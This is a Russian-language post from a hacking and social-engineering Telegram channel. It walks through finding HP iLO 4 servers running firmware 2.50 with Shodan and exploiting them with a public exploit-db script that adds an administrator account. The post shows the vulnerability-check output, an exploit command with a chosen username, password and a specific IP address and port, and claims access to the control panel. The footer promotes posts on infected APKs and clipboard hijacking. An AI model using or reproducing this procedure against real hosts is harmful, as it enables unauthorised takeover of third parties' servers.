Shodan. HP iLO RCE.

Shodan. HP iLO RCE.

Social Engineering

Существует старая уязвимость 2018 года, связанная с системой управления серверами HP.

В Сети в открытом доступе опубликован эксплоит для серьезной уязвимости в серверах Hewlett Packard Integrated Lights-Out 4 (HP iLO 4)

подробнее тут и здесь

Был взят эксплойт с ресурса https://www.exploit-db.com/exploits/44005 HPE iLO 4 < 2.53 – Add New Administrator User

Сделав запрос в шодане получаем сервера с iLO v2.5

Код:

iLO-Firmware: 2.50

iLO-Firmware: 2.50

Код:

При проверке с ключом -t . видим список администраторов

[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator
[+] Account name: User Account Username: Black

запускаем эксплойт с ключами -e -u shodan -p shodan@1234Shodan 173.13.58.217:8889

авторизация

панель управления

так же хочется добавить аналог шодана FOFA

Social Engineering - Канал посвященный психологии, социальной инженерии, профайлингу, НЛП, Хакингу, Анонимности и безопасности в сети интернет, Даркнету и все что с ним связано. Добро пожаловать ;-)


S.E.Book - Литература социального инженера.

@Social_Engineering_bot - Бот обратной связи.

  1. Получаем доступ к андроиду через зараженный APK.
  2. Подмена буфера обмена.
  3. Когнитивные искажения.
  4. 5 способов отсылки полностью анонимных электронных писем.
  5. Речевая стратегия. Ограничение выбора | Отрицание.
Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org